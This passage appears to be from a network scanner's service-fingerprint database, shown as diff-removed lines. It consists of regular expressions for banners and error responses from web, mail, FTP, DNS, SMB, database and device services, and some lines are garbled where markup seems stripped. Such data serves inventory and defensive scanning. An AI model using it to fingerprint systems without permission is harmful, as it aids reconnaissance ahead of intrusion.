-Nice try\.\.\.\r\n -HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n -HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n -\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 -=\0\0\0 -Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n -Login name: GET \t\t\tIn real life: \?\?\?\r\n - +-;;=\n +\.;M####\+\n -User not found\r\n -EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n -Login name: HTTP/1\.0 In real life: \?\?\?\r\n -3That item is not currently available\.\r\n -\0\0\0\0/\x20HT -HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document -HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n -match http m%^HTTP/1\.1 401 Unauthorized\r\nConnection: close\r\nWWW-Authenticate: Basic realm=\"(?:MLdonkey|P2P)\"\r\n% p/MLDonkey multi-network P2P web interface/ -HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n -HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n -HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n -HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) -HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n -HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. -HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n -HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n -HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n -HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager -HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n -HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page -:Default-Chat-Community 421 \* GET :Unknown command\r\n -:([-\w_.]+) 451 :You have not registered your connection\r\n -<\?xml version='1\.0'\?> -Invalid XML -Invalid XML -<\?xml version='1\.0' encoding='UTF-8'\?>\n\n -JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n -\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f -ERR unknown_command Unknown\+server\+command\r\n -# Wrongly matches SSL in some cases -..\x0a\0x\x01 -ERROR\n -1INVALID REQUEST -\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP -SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n -\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol -\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol --ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n --ERR Fatal error: pop3s: required OpenSSL options not present\r\n -EFATAL: invalid length of startup packet\n\0 -action=dunno\n\n --ERR wrong number of arguments for 'get' command\r\n -0 serverclose 0\n -HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n -HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n -ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) -HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n -\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: -\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n -HTTP/1\.0 503 Directory busy, try again later\r\n\r\n -HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n -HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n -login: Login incorrect\. -HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n -HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

\0 -\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n -\x01\0\0\0\x02\0\0 - -HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n -HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n -HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n -\x10\x1a\x0b\x00\x60\x4d -HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error -\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n -RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request -RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n -RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n -HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n -(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n -<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. -\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 -match syncsort-cmagent m=^\x80\0\0J\x0f\x02\x02\x06\t\x1d\x02\x11m\x04\x15\x17\x01\x06c\|sww{t\x1b{uwOn\x04\x0f\x1d\x19wE\x0f\x13\x15\x08\x13g\x06\x03\x15\x04\x08\x0f\x13e\x18fm~ug\x10\0\x1dl\x01\x0f\ne\x0f\x04\nm\x17qkzdn}qG= p/Syncsort Backup Express cmagent/ -\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 -match ossec-agent m=^\xdf\x06\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\x97\|\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\0\0= p/OSSEC Agent/ -match telnet m=^\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0Log level 3\r\r\nUsername: data_error\r\r\n\(rdata_error\r\r\ndata_error\r\r\ndata_error\r\r\ndata_error\r\r\ndata_error\r\r\ndata_error\r\r\ndata_error\r\r\ndata_error\r\r\ndata_error\r\r\n\|= p/Jungo OpenRG telnetd/ i/Pirelli A125G wireless DSL router/ d/WAP/ o/Linux/ cpe:/o:linux:kernel/a -\x01Permission denied\.\n -\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError -\x16\x15\x16\x16\x16\x12XW\] -# Has to come before BIND matches. -\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com -\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) -\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... -\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 -# Has to come before BIND matches. -..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c -\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 -..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( -\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 -\x01Login incorrect\.\n -\x01rexecd: Login incorrect.?\n -\x01rexecd: [-\d]+ Connexion incorrecte\.\n -\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 -\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 -\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 -\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 -\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 -\0\^A\^@\^@\^@\^@\^@\^@\^Gversion\^Dbind\^@\^@\^P\^@\r\n-> shell restarted\.\r\n\r\n-> -\0\r\n-> trcStack aborted: error in top frame\r\ntShell restarted\.\r\n\r\n-> !1 echo_recv: -1\.\r\n -\x01krshd: Echec de l'authentification Kerberos\.\r\n\0 -\0\x1e\0\x06\0\t\0\0 -\0\x11Invalid command\n\0\0\0 -\x01krlogind: Echec de l'authentification Kerberos\.\r\n\0 -\x01in\.utrcmdd \(remote\): protocol error \(1\)\n\0 -1\0 -\0&\xeb\xefTQM\xee\[B -\0(?:\x03\x58\0)?\x6a\x01\0\0\0\0Your client is too old\. To use this server, please upgrade your client to a Freeciv 2\.2 or later\.\0\0\0\x03\0\0\x03\x01 -\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol -.*\Id: //ral_depot/products/current/ENDPOINT/CODE/client\.c -\x04\x01\0\(\0\0\0\0\xaa\0\x14\0\0\x0f\xa2\x01\x0eLogin failed\.\n\xfd\0\x02\0\x02\0\0\0\0 -\0\x1e\x02\x06\x01\0\0\0\0\0\0\xf1\0 -HTTP/1\.0 414 Request-URI Too Long\r\nServer: Linux/([\w._-]+) UPnP/([\w._-]+) fbxigdd/([\w._-]+)\r\nConnection: close\r\n\r\n -\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0 -\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0 -\0\0s\0\0\0\0\0 -\xff\0\x0e\0P\0r\0o\0t\0o\0c\0o\0l\0 \0e\0r\0r\0o\0r -\d{1,2}:\d\d:\d\d \d{1,2}/\d\d/\d{4}\n -220 ([\w_.-]+) ESMTP\r\n501 ehlo requires domain/address - see RFC-2821 4\.1\.1\.1\r\n -220 ([\w_.-]+) ready\r\n250-[\w_.-]+\r\n250 AUTH LOGIN PLAIN \r\n -cvs \[pserver aborted\]: bad auth protocol start: HELP\r\n\n? -cvs \[server aborted\]: bad auth protocol start: HELP\r\n -cvs \[server aborted\]: bad auth protocol start: HELP\r\nerror \n -cvs-pserver \[pserver aborted\]: bad auth protocol start: HELP\r\n\n -HELP\r\n -match ftp m%^220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n(?:214-| )USER PASS ACCT\* CWD XCWD CDUP XCUP SMNT\* \r\n(?:214-| )QUIT REIN\* PORT PASV EPRT EPSV TYPE STRU \r\n(?:214-| )MODE RETR STOR STOU APPE ALLO\* REST RNFR \r\n(?:214-| )RNTO ABOR DELE MDTM RMD XRMD MKD XMKD \r\n(?:214-| )PWD XPWD SIZE LIST NLST SITE SYST STAT \r\n% p/ProFTPD/ v/1.2.8 - 1.2.9/ o/Unix/ cpe:/a:proftpd:proftpd/ -220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\):\r\n CWD XCWD CDUP XCUP SMNT\* QUIT PORT PASV \r\n EPRT EPSV ALLO\* RNFR RNTO DELE MDTM RMD \r\n XRMD MKD XMKD PWD XPWD SIZE SYST HELP \r\n NOOP FEAT OPTS AUTH\*? CCC\* CONF\* ENC\* MIC\* \r\n PBSZ\*? PROT\*? TYPE STRU MODE RETR STOR STOU \r\n -220 FTP server ready\.\r\n214- The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n PASS LPRT STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n ACCT\* EPRT MODE MSND\* REST XCWD HELP PWD MDTM \r\n SMNT\* PASV RETR MSOM\* RNFR LIST NOOP XPWD \r\n REIN\* LPSV STOR MSAM\* RNTO NLST MKD CDUP \r\n QUIT EPSV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n214 End\.\r\n -220 ([-\w_.]+) FTP server \(UNIX_SV ([\d.]+)\) ready\.\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT STOR MSAM\* RNTO NLST MKD CDUP \r\n PASS PASV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n ACCT\* TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n SMNT\* STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n REIN\* MODE MSND\* REST XCWD HELP PWD MDTM \r\n QUIT RETR MSOM\* RNFR LIST NOOP XPWD \r\n -220 FTP server ready\r\n214-The following commands are recognized:\r\nHELP\tUSER\tPASS\tQUIT\tLIST\tNLST\r\nRETR\tSTOR\tCWD\tTYPE\tPORT\tPWD\r\nSTRU\tMODE\tALLO\tACCT\tPASV\tNOOP\r\nDELE\tEPRT\tEPSV\r\n214 End of command list\.\r\n| p|TopLayer/Alcatel ftpd -220 Connection established\.\r\n214-The following commands are supported:\r\n\tUSER\tPORT\tTYPE\tABOR\tCWD \tLIST\r\n -220 FTP Server Ready\r\n.*\r\n214 Direct comments to psp@amoks\.com\.\r\n -220 FTP server ready\r\n211 HELP text\r\n -220 Connection established\.\r\n214-The following commands are supported\.\r\n USER PORT TYPE ABOR CWD LIST\r\n PASS PASV STRU PWD XCWD NLST\r\n QUIT STOR MODE XPWD NOOP HELP\r\n214 End of HELP\r\n -220 Welcome to connection\.\r\n214 FTP Server Help\.\r\n HUMAX PVR FTP Server\. \r\n214 End\r\n -(?:220-.*\r\n)?220 .*\r\n530 Please login with USER and PASS\.\r\n -220 Service Ready\r\n502 Command Not implemented\r\n -HTTP/1\.1 400 Parse error: Could not parse request line \(split\.length=1\): HELP\r\n -0 , 0 : ERROR : UNKNOWN-ERROR\r\n -HELP : USERID : UNIX : trilluser\r\n -\d+, \d+ : USERID : UNIX : [-.@\w]+\r\n -0, 0 : ERROR : UNKNOWN-ERROR -:([-\w_.]+) 451 \* :You have not registered\r\n -:([-\w_.]+) 451 \* :Register first\.\r\n -NOTICE AUTH :\*\*\* Checking Ident\r\n:([-\w_.]+) 451 \* :Register first\.\r\n -:([-\w_.]+) 290 :\.-----------------=#\[ euIRCd HelpSystem \]#=----------------\.\n -200 NNTP server ready\r\n100 Avaliable commands:\r\nARTICLE\r\nAUTHINFO\r\nBODY\r\nGROUP\r\nHEAD\r\nHELP\r\nIHAVE\r\nLAST\r\nLIST\r\nNEWGROUPS\r\nNEWNEWS\r\nNEXT\r\nPOST\r\nQUIT\r\nSLAVE\r\nSTAT\r\nXHDR\r\n\.\r\n| p|Hamster Playground/Kerio nntpd -\x01Socket \d+ received unknown command 0x48 with arguments ELP -false;error while receiving message from client\n -220 ([-.+\w]+) Generic SMTP handler\r\n214 Help not supported by this implementation\r\n -220.*?\n214-Commands supported:\r\n214- HELO EHLO MAIL RCPT DATA(?: ETRN)?(?: AUTH)?\r\n214 NOOP QUIT RSET HELP \r\n -220 ([-.\w]+) SMTP version 1\.00;\r\n214 We strongly advise you to study (?:of )?the RFC ?821\.\.\.\r\n -220 ([-\w_.]+) ESMTP\r\n402 Error: command not implemented\r\n -220 smtpd\r\n502 [\d.]+ Error: command not recognized\r\n -220 E?SMTP [^\r\n]*\r\n502 5\.5\.2 Error: command not recognized\r\n -220 ([-\w_.]+) ESMTP \w+\r\n -220 (\S+) E?SMTP Sendmail; -220.*214 SMTP server comments and bug reports to: \ -220.*500 MessageWall: Unrecognized command -220 .*\r\n214-Commands Supported:\r\n214-HELO EHLO AUTH HELP QUIT MAIL NOOP RSET RCPT DATA ETRN VRFY STARTTLS\r\n214-Copyright \(c\) 1995-200\d, Stalker Software, Inc\.\r\n -220 .* ESMTP\r\n214-Gentoo Linux qmail-([-\w.]+)\r\n214 qmail home page: http://pobox\.com/~djb/qmail\.html\r\n -220 ([-\w_.]+) ESMTP\r\n214-The following commands are recognized\r\n214-\tauth\tdata\tehlo\t -220 \[?([-\w_.]+)\]? ESMTP server ready\.\r\n214-Recognized SMTP commands are:\r\n214- HELO EHLO MAIL RCPT DATA RSET\r\n214- AUTH NOOP QUIT HELP VRFY SOML\r\n214 Mail server account is '([-\w_.]+)'\.\r\n| p|Mercury/32 smtpd -220 ([-\w_.]+) Server ESMTP ready at .*\r\n241-\r\n -220 ([-\w_.]+) ESMTP \r\n -220 ([-\w_.]+)\r\n214-Commands supported:\r\n214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP\r\n -220 ([-\w_.]+) MailShield SMTP\r\n -220-([-\w_.]+) ESMTP\r\n220-MagicMail Daemon with Built-In Anti-Spam\r\n220 See http://www\.linuxmagic\.com for info\r\n214 qmail home page: http://cr\.yp\.to/qmail\.html, LinuxMagic Support http://www\.linuxmagic\.com\r\n -220 ESMTP Service ready at .*\r\n214-Enter one of the following commands:\r\n214-HELO EHLO MAIL RCPT DATA RSET NOOP QUIT\r\n214 HELP \r\n -220 ([-\w_.]+) ESMTP MTA\r\n214-This is Sendmail version AIX([\d.]+)/([\w.]+)\r\n -220 Service ESMTP Ready\r\n214-This is Sendmail version ([\d.]+) \((P[-\w_.]+)\)\r\n.*future enhancements, contact your HP representative -220 ([-\w_.]+)\r\n502 Command not implemented\r\n -220 ([-\w_.]+) ESMTP[^\r\n]*\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n\r\n -220 ([-\w_.]+) - Ready at .*\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA RSET NOOP QUIT\r\n214- For more info use 'HELP '\.\r\n214 End of HELP info\r\n -220 ESMTP Service ready\r\n500 Command unrecognized\r\n -220 ([-\w_.]+) ESMTP [-\w_.]+ Mail Server ([\d.]+); .*\r\n214-2\.0\.0 This is [-\w_.]+ Mail Server [-\w_.]+\r\n214-2\.0\.0 Topics:\r\n -220 WebMail ESMTP\r\n502 negative vibes\r\n -220 Welcome to the mail server\.\r\n211 DATA EXPN HELO MAIL NOOP QUIT RCPT RSET SAML SEND SOML TURN VRFY\r\n -220 .*\r\n214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-\w_.]+ \(([-\w_.]+)\)\r\n -220 ([-\w_.]+) Service ready\.\r\n214- Valid commands are:\r\n214- HELO MAIL RCPT DATA RSET QUIT NOOP\r\n214- HELP VRFY\r\n214- Commands not valid are:\r\n214- SEND SOML SAML TURN\r\n214- Mail forwarding handled by this server\.\r\n| p|i5/OS V5R4M0 or OS/400 smtpd -220 ([-\w_.]+) ESMTP server is ready\r\n.*214-Copyright \(c\) 1995-2004, Stalker Software, Inc\.\r\n -220 ([-\w_.]+) ESMTP\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n -220 ([-\w_.]+) ESMTP Generic Ready\r\n502 Command not implemented\.\r\n -220 ([\w_.-]+) ESMTP\r\n214-Run 'info anubis' or visit http://www\.gnu\.org/software/anubis/manual/\r\n214 End of HELP info\r\n -220 SMTP service ready\r\n214-Commands:\r\n214-\tDATA\tRCPT\tMAIL\tQUIT\tRSET\r\n214 \tHELO\tVRFY\tEXPN\tHELP\tNOOP\r\n -220 ready\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA\r\n214- RSET NOOP QUIT HELP\r\n214- VRFY EXPN\r\n214-For more info use HELP \r\n214 End of HELP info\r\n -220 ([-\w_.]+) SMTP; .*\r\n500 Syntax error, command unrecognized\.\r\n -220 ([-\w_.]+) SMTP; .* \+\d{4}\r\n500 Syntax error, command unrecognized\r\n -220 ([-\w_.]+) ESMTP smtprelay service ready\.\r\n214-This is smtprelay\r\n214-Topics: -220 SMTP ESMTP ready at .*0\r\n214-\r\n214 End of HELP info\r\n -220 ([-\w_.]+)\r\n214-HELO domain\r\n214-EHLO domain\r\n214-QUIT\r\n214-MAIL FROM: \[options\]\r\n -220 ([-\w_.]+) ESMTP Ready\r\n211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP\r\n -220 ([-\w_.]+) SMTP Relay Service ready\r\n500 Syntax error, command unrecognized\r\n -503 Synchronization error\r\n -(sgi_[-.\w]+\r\n(?:[-.\w]+\r\n)*) -Welcome to Vulnerable Server! Enter HELP for help\.\nValid Commands:\nHELP\nSTATS \[stat_value\]\nRTIME \[rtime_value\]\nLTIME \[ltime_value\]\nSRUN \[srun_value\]\nTRUN \[trun_value\]\nGMON \[gmon_value\]\nGDOG \[gdog_value\]\nKSTET \[kstet_value\]\nGTER \[gter_value\]\nHTER \[hter_value\]\nLTER \[lter_value\]\nKSTAN \[lstan_value\]\nEXIT\n -Commands: HELP VER GET LIST SET INSTCMD LOGIN LOGOUT USERNAME PASSWORD STARTTLS\n -Commands: VER REQ HELP LISTVARS LOGOUT LOGIN PASSWORD LISTRW VARTYPE VARDESC ENUM SET INSTCMD LISTINSTCMD INSTCMDDESC FSD MASTER USERNAME STARTTLS\n -\x05\xff -\x01\x03\0\0........\0\0\0\0........\x9f\xfb.([^\0\x01]+)[\0\x01].*VMware(\d+),(\d+)\x05\x06AFP3\.4\x06AFP3\.3\x06AFP3\.2\x06AFP3\.1\x06AFPX03\x06\tDHCAST128\x04DHX2\x06Recon1\rClient Krb v2\x03GSS\x0fNo User Authent.*\x1b\not_defined_in_RFC4178@please_ignore -AB\0N\x04\x01\x94\0\x06/cccb/\0\0\x02\0\x0cContent-Type\0\0\x17text/html;charset=utf-8\0\0\x0eContent-Length\0\0\x03970\0AB\x03 -\x02\0\0\x01\x03\0U\xd0DSQ\x02\0\0\x01\x03\0U\xd0DSQ -\0\r\nlogin: \^W\^@\^@\^@\^ -\x15\x01\0\0\x08\0\0\0\0\x80\t\x03\x08 -\x16\x03\0\0\*\x02\0\0&\x03.*\x0edropbox-client0 -\x16\x03\0\0\*\x02\0\0&\x03\0.*T[oO][rR]1.*[\x00-\x20]([-\w_.]+) -\x16\x03\0.*Router\([a-zA-Z0-9_-]+).*Sophos EM Certification Manager -\x16\x03\0.*Sophos EM Certification Manager -\0\0MF\xff\xf3MBr\0\0\0\0\x08\x01@\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1\.0\0\x02MICROSOFT NETWORKS 1\.03\0\x02MICROSOFT NETWORKS 3\.0\0\x02LANMAN1\.0\0\x02LM1\.2X002\0\x02Samba\0\x02NT LANMAN 1\.0\0\x02NT LM 0 -match bmc-tmart m=^\x15uBMC TM ART Version ([\w._-]+, Build \d+ from [\d-]+), Copyright \? [\d-]+ BMC Software, Inc\. \| All Rights Reserved\.= p/BMC Transaction Management Application Response Time/ v/1/ -\0\0\0\0\0\0\0=r\0\0\0\0\0\0\0\xd8\x97%\x01\x13\0\0\0CONDUCTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19240920 -\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0h\xd52\t\x10\0\0\0FUNDUS_PG([\w._-]+)\x1b\0\0\0unbekannter Code: 154326376 -\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0XL\)\x01\x11\0\0\0PARATUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19483736 -\0\0\0\0\0\0\0>r\0\0\0\0\0\0\0\xf8\x926\x01\x14\0\0\0CONSPECTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 20353784 -\xce\xfa\x01\0\x16\0\0\0\0\0\0\x003\xf6\0\0\0\0\0\0\0\0 -\x52\x00\x00\x00\x08\x00\x00\x00\x03 -\0\0\0\x02\0\x03 -\0\0\x01\x01@\n\0\x08\x80\0\x82\0L\xb8..\xff\xff\xff\xff\0\0\0\0 -\0\0\0\x61\xffSMBr\0\0\0\0\x88\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0\x02\x0a\0\x01\0....\xff\xff\x00\x00....\0\x03\0\0\0 -\0\0\0.\xffSMBr\0\0\0\0\x88..\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0..\0\x01\0..\0\0...\0..\0\0 -\x83\0\0\x01\x8f -\0\0\0.\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0.*\W([-_.\w]+)\0 -\0\0\0.\xffSMBr\0\0\0\0\x88\x01.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0 -\0\0\0M\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0\x02\x01\0\x01\0\xff\xff\0\0\xff\xff\0\0\0\0\0\0\x01\x02\0\0 -\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0WORKGROUP\0 -\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\0\0\0.15\0 \x07\x01\[12:1\]\0 \x07\x02\[2003\]\0 \x07\x051\d+\0 INET\0 ([\w._-]+)\0|s p|HP OpenView Omniback/Data Protector -E\0\0\0.S\w+\0C0A000\0Mel protocolo 65363\.19778 no est..? soportado: servidor soporta 1\.0 hasta 3\.0\0Fpostmaster\.c\0L\d+\0 -E\0\0\0.S\w+\0C0A000\0Mnicht unterst\xc3\xbctztes Frontend-Protokoll 65363\.19778: Server unterst\xc3\xbctzt 1\.0 bis 3\.0\0Fpostmaster\.c\0L\d+\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1293\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1408\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1445\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 